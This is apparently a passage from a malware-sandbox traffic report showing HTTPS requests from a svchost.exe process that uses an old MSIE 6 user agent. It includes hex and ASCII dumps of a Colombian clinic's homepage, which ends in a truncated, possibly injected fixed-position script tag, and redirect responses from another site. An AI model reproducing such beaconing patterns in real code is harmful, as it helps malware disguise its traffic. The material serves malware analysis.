                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC735INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-gr
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC737INData Raw: 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c
                                                                                                                                                                                                                                                                        Data Ascii: tainer" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a><
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC738INData Raw: 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65
                                                                                                                                                                                                                                                                        Data Ascii: m g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-ite
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC739INData Raw: 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67
                                                                                                                                                                                                                                                                        Data Ascii: class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC741INData Raw: 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f
                                                                                                                                                                                                                                                                        Data Ascii: class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-compo
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC742INData Raw: 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63
                                                                                                                                                                                                                                                                        Data Ascii: ><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup bac
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC744INData Raw: 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66
                                                                                                                                                                                                                                                                        Data Ascii: : 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gaf
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC745INData Raw: 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72
                                                                                                                                                                                                                                                                        Data Ascii: ById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC746INData Raw: 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d
                                                                                                                                                                                                                                                                        Data Ascii: ock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC748INData Raw: 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62
                                                                                                                                                                                                                                                                        Data Ascii: /home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedb
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC749INData Raw: 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20
                                                                                                                                                                                                                                                                        Data Ascii: pecialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC750INData Raw: 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                        Data Ascii: -home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class=
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC752INData Raw: 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20 69 64 3d 22 67 2d 66 6f 6f 74 65 72 22 3e 0a 3c 64
                                                                                                                                                                                                                                                                        Data Ascii: ss="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer id="g-footer"><d
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC753INData Raw: 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70 2e 6d 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72
                                                                                                                                                                                                                                                                        Data Ascii: e atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p.m.</br><br></br
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC754INData Raw: 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 50 42 58 3a 20 2b 35 37 20
                                                                                                                                                                                                                                                                        Data Ascii: /div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contact-text">PBX: +57
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC756INData Raw: 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                                                        Data Ascii: ticle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" class="g-conte
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC757INData Raw: 34 34 36 0d 0a 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74
                                                                                                                                                                                                                                                                        Data Ascii: 446 type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script language="JavaScript" type="text
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC758INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        45192.168.2.654892138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC671OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC671INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC672INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        46192.168.2.654996138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC672OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC673INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
